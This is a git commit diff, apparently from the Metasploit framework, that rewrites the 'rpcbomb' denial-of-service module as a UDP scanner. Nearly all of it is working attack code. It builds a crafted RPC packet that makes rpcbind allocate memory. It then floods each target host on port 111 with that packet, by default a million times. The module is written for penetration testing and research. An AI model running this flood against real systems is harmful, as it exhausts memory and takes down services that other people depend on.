make this a UDPScanner, rewrite

Brent Cook · Brent Cook · commit a5805a55dc6e · 2017-06-05T12:39:48.000-05:00
diff --git a/modules/auxiliary/dos/rpc/rpcbomb.rb b/modules/auxiliary/dos/rpc/rpcbomb.rb
@@ -6,7 +6,7 @@
 class MetasploitModule < Msf::Auxiliary
 
   include Msf::Auxiliary::Dos
-  # include Exploit::Remote::Udp
+  include Msf::Auxiliary::UDPScanner
 
   def initialize(info={})
     super(update_info(info,
@@ -32,49 +32,42 @@ def initialize(info={})
 
     register_options([
       Opt::RPORT(111),
-      OptAddress.new('RHOST', [true, 'RPC server target']),
-      OptInt.new('ALLOCSIZE', [true, 'Number of bytes to allocate']),
-      OptInt.new('COUNT', [false, "Number of intervals to loop",1])
+      OptInt.new('ALLOCSIZE', [true, 'Number of bytes to allocate', 1000000]),
+      OptInt.new('COUNT', [false, "Number of intervals to loop", 1000000])
     ])
   end
 
+  def scan_host(ip)
+    pkt = [
+      0,        # xid
+      0,        # message type CALL
+      2,        # RPC version 2
+      100000,   # Program
+      4,        # Program version
+      9,        # Procedure
+      0,        # Credentials AUTH_NULL
+      0,        # Credentials length 0
+      0,        # Credentials AUTH_NULL
+      0,        # Credentials length 0
+      0,        # Program: 0
+      0,        # Ver
+      4,        # Proc
+      4,        # Argument length
+      datastore['ALLOCSIZE'] # Payload
+    ].pack('N*')
 
-
-  def run
-    require 'socket'
-
-    pkt = [0].pack('N')         # xid
-    pkt << [0].pack('N')        # message type CALL
-    pkt << [2].pack('N')        # RPC version 2
-    pkt << [100000].pack('N')   # Program
-    pkt << [4].pack('N')        # Program version
-    pkt << [9].pack('N')        # Procedure
-    pkt << [0].pack('N')        # Credentials AUTH_NULL
-    pkt << [0].pack('N')        # Credentials length 0
-    pkt << [0].pack('N')        # Credentials AUTH_NULL
-    pkt << [0].pack('N')        # Credentials length 0
-    pkt << [0].pack('N')        # Program: 0
-    pkt << [0].pack('N')        # Ver
-    pkt << [4].pack('N')        # Proc
-    pkt << [4].pack('N')        # Argument length
-    pkt << [datastore['ALLOCSIZE']].pack('N') # Payload
-
-    s = UDPSocket.new
+    s = udp_socket(ip, datastore['RPORT'])
     count = 0
     while count < datastore['COUNT'] do
-      s.send(pkt, 0, datastore['RHOST'], datastore['RPORT'])
+      begin
+        s.send(pkt, 0)
+      rescue ::Errno::ENOBUFS, ::Rex::ConnectionError, ::Errno::ECONNREFUSED
+        vprint_error("Host #{ip} unreachable")
+        break
+      end
       count += 1
     end
 
-    sleep 1.5
-
-    begin
-        s.recvfrom_nonblock(9000)
-    rescue
-        print_error("No response from server received.")
-        return
-    end
-
-    print_good("Completed #{datastore['COUNT']} loop(s) of allocating #{datastore['ALLOCSIZE']} bytes at host #{datastore['RHOST']}:#{datastore['RPORT']}")
+    vprint_good("Completed #{count} loop(s) of allocating #{datastore['ALLOCSIZE']} bytes on host #{ip}:#{datastore['RPORT']}")
   end
 end
